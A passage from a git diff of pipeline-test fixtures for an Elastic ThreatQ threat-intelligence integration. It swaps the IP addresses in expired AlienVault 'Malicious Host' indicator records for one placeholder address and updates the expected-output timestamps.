19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"69.162.74.166"} \ No newline at end of file +{"adversaries":[],"attributes":[{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1877,"indicator_id":336,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1878,"indicator_id":336,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"MP"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1879,"indicator_id":336,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Saipan"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1880,"indicator_id":336,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1881,"indicator_id":336,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1882,"indicator_id":336,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"1ece659dcec98b1e1141160b55655c96","id":336,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":336,"indicator_id":336,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1883,"indicator_id":337,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1884,"indicator_id":337,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1885,"indicator_id":337,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1886,"indicator_id":337,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1887,"indicator_id":337,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1888,"indicator_id":337,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Sacramento"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"73c98d43519990c841a5d022546fedd4","id":337,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":337,"indicator_id":337,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1889,"indicator_id":338,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1890,"indicator_id":338,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1891,"indicator_id":338,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1892,"indicator_id":338,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1893,"indicator_id":338,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"New York"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1894,"indicator_id":338,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"a9c6773919112627495d87c51fe89b15","id":338,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":338,"indicator_id":338,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":8,"created_at":"2020-09-11 14:35:43","id":184,"indicator_id":34,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:35:49","updated_at":"2020-10-15 14:35:49","value":"4"},{"attribute_id":6,"created_at":"2020-09-11 14:35:43","id":185,"indicator_id":34,"name":"AlienVault Revision","touched_at":"2020-10-15 14:35:49","updated_at":"2020-10-15 14:35:49","value":"3"},{"attribute_id":3,"created_at":"2020-09-11 14:35:43","id":186,"indicator_id":34,"name":"Description","touched_at":"2020-10-15 14:35:49","updated_at":"2020-10-15 14:35:49","value":"Malicious Host"},{"attribute_id":7,"created_at":"2020-09-11 14:35:43","id":187,"indicator_id":34,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:35:49","updated_at":"2020-10-15 14:35:49","value":"2"}],"class":"network","created_at":"2020-09-11 14:35:41","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:02","hash":"56f3cb07a9055f52947bb4c4244f762d","id":34,"published_at":"2020-09-11 14:35:41","score":4,"sources":[{"created_at":"2020-09-11 14:35:43","creator_source_id":12,"id":34,"indicator_id":34,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:43","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:35:49"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1901,"indicator_id":340,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1902,"indicator_id":340,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1903,"indicator_id":340,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1904,"indicator_id":340,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1905,"indicator_id":340,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1906,"indicator_id":340,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Sacramento"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"97624a37200db6ba0bcfce8c9c28f527","id":340,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":340,"indicator_id":340,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1907,"indicator_id":341,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1908,"indicator_id":341,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1909,"indicator_id":341,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1910,"indicator_id":341,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Houston"},{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1911,"indicator_id":341,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1912,"indicator_id":341,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"56a1917632c03f230c5645f432e71495","id":341,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":341,"indicator_id":341,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00","provider":"testprovider","tlp_name":"testtlp"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1913,"indicator_id":342,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1914,"indicator_id":342,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Fort Lauderdale"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1915,"indicator_id":342,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1916,"indicator_id":342,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1917,"indicator_id":342,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1918,"indicator_id":342,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"6de45834c2a81597b59a91ead4fbdf59","id":342,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":342,"indicator_id":342,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1919,"indicator_id":343,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1920,"indicator_id":343,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Pompano Beach"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1921,"indicator_id":343,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1922,"indicator_id":343,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1923,"indicator_id":343,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1924,"indicator_id":343,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"994a4586b27e46db67a59220ab6dd73f","id":343,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":343,"indicator_id":343,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1937,"indicator_id":346,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1938,"indicator_id":346,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1939,"indicator_id":346,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1940,"indicator_id":346,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1941,"indicator_id":346,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Little Elm"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1942,"indicator_id":346,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"40e81e10007099902cf40cfe3a8227dc","id":346,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":346,"indicator_id":346,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} +{"adversaries":[],"attributes":[{"attribute_id":7,"created_at":"2020-09-11 14:35:53","id":1943,"indicator_id":347,"name":"AlienVault Threat Level","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"2"},{"attribute_id":4,"created_at":"2020-09-11 14:35:53","id":1944,"indicator_id":347,"name":"Country","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"US"},{"attribute_id":3,"created_at":"2020-09-11 14:35:53","id":1945,"indicator_id":347,"name":"Description","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Malicious Host"},{"attribute_id":6,"created_at":"2020-09-11 14:35:53","id":1946,"indicator_id":347,"name":"AlienVault Revision","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"3"},{"attribute_id":5,"created_at":"2020-09-11 14:35:53","id":1947,"indicator_id":347,"name":"City","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"Dallas"},{"attribute_id":8,"created_at":"2020-09-11 14:35:53","id":1948,"indicator_id":347,"name":"AlienVault Reliability","touched_at":"2020-10-15 14:36:00","updated_at":"2020-10-15 14:36:00","value":"4"}],"class":"network","created_at":"2020-09-11 14:35:51","expired_at":"2020-11-15 00:00:02","expires_calculated_at":"2020-10-15 14:40:03","hash":"418a88a2a1bac6980a7d83e6b2b2a27d","id":347,"published_at":"2020-09-11 14:35:51","score":4,"sources":[{"created_at":"2020-09-11 14:35:53","creator_source_id":12,"id":347,"indicator_id":347,"indicator_status_id":2,"indicator_type_id":15,"name":"AlienVault OTX","published_at":"2020-09-11 14:35:53","reference_id":1,"source_expire_days":"30","source_id":12,"source_score":1,"source_type":"connectors","updated_at":"2020-10-15 14:36:00"}],"status":{"description":"No longer poses a serious threat.","id":2,"name":"Expired"},"status_id":2,"touched_at":"2021-06-07 19:47:27","type":{"class":"network","id":15,"name":"IP Address"},"type_id":15,"updated_at":"2020-11-15 00:00:02","value":"89.160.20.156"} \ No newline at end of file diff --git a/packages/ti_threatq/data_stream/threat/_dev/test/pipeline/test-threatq-sample-ndjson.log-expected.json b/packages/ti_threatq/data_stream/threat/_dev/test/pipeline/test-threatq-sample-ndjson.log-expected.json index 827cad3136e..ba36aab6f74 100644 --- a/packages/ti_threatq/data_stream/threat/_dev/test/pipeline/test-threatq-sample-ndjson.log-expected.json +++ b/packages/ti_threatq/data_stream/threat/_dev/test/pipeline/test-threatq-sample-ndjson.log-expected.json @@ -29,19 +29,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.44.202.220", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "69.44.202.220" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368798314Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1877,\"indicator_id\":336,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1878,\"indicator_id\":336,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"MP\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1879,\"indicator_id\":336,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Saipan\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1880,\"indicator_id\":336,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1881,\"indicator_id\":336,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1882,\"indicator_id\":336,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"1ece659dcec98b1e1141160b55655c96\",\"id\":336,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":336,\"indicator_id\":336,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.44.202.220\"}", + "ingested": "2021-12-09T13:49:13.119392Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1877,\"indicator_id\":336,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1878,\"indicator_id\":336,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"MP\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1879,\"indicator_id\":336,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Saipan\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1880,\"indicator_id\":336,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1881,\"indicator_id\":336,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1882,\"indicator_id\":336,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"1ece659dcec98b1e1141160b55655c96\",\"id\":336,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":336,\"indicator_id\":336,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"89.160.20.156\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -79,19 +79,19 @@ }, "expires_calculated_at": "2020-10-15T14:40:03.000Z", "published_at": "2020-09-11T14:35:51.000Z", - "indicator_value": "69.94.155.176", + "indicator_value": "89.160.20.156", "status": "Expired" }, "threat": { "indicator": { "type": "ipv4-addr", "confidence": "Low", - "ip": "69.94.155.176" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-10-26T07:49:05.368829212Z", - "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1883,\"indicator_id\":337,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1884,\"indicator_id\":337,\"name\":\"Country\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"US\"},{\"attribute_id\":3,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1885,\"indicator_id\":337,\"name\":\"Description\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Malicious Host\"},{\"attribute_id\":6,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1886,\"indicator_id\":337,\"name\":\"AlienVault Revision\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"3\"},{\"attribute_id\":8,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1887,\"indicator_id\":337,\"name\":\"AlienVault Reliability\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"4\"},{\"attribute_id\":5,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1888,\"indicator_id\":337,\"name\":\"City\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"Sacramento\"}],\"class\":\"network\",\"created_at\":\"2020-09-11 14:35:51\",\"expired_at\":\"2020-11-15 00:00:02\",\"expires_calculated_at\":\"2020-10-15 14:40:03\",\"hash\":\"73c98d43519990c841a5d022546fedd4\",\"id\":337,\"published_at\":\"2020-09-11 14:35:51\",\"score\":4,\"sources\":[{\"created_at\":\"2020-09-11 14:35:53\",\"creator_source_id\":12,\"id\":337,\"indicator_id\":337,\"indicator_status_id\":2,\"indicator_type_id\":15,\"name\":\"AlienVault OTX\",\"published_at\":\"2020-09-11 14:35:53\",\"reference_id\":1,\"source_expire_days\":\"30\",\"source_id\":12,\"source_score\":1,\"source_type\":\"connectors\",\"updated_at\":\"2020-10-15 14:36:00\"}],\"status\":{\"description\":\"No longer poses a serious threat.\",\"id\":2,\"name\":\"Expired\"},\"status_id\":2,\"touched_at\":\"2021-06-07 19:47:27\",\"type\":{\"class\":\"network\",\"id\":15,\"name\":\"IP Address\"},\"type_id\":15,\"updated_at\":\"2020-11-15 00:00:02\",\"value\":\"69.94.155.176\"}", + "ingested": "2021-12-09T13:49:13.119397500Z", + "original": "{\"adversaries\":[],\"attributes\":[{\"attribute_id\":7,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1883,\"indicator_id\":337,\"name\":\"AlienVault Threat Level\",\"touched_at\":\"2020-10-15 14:36:00\",\"updated_at\":\"2020-10-15 14:36:00\",\"value\":\"2\"},{\"attribute_id\":4,\"created_at\":\"2020-09-11 14:35:53\",\"id\":1884,\"indicator_id\":337,\"name\":\"Country\",\"touched_at\":\"2020-10-15 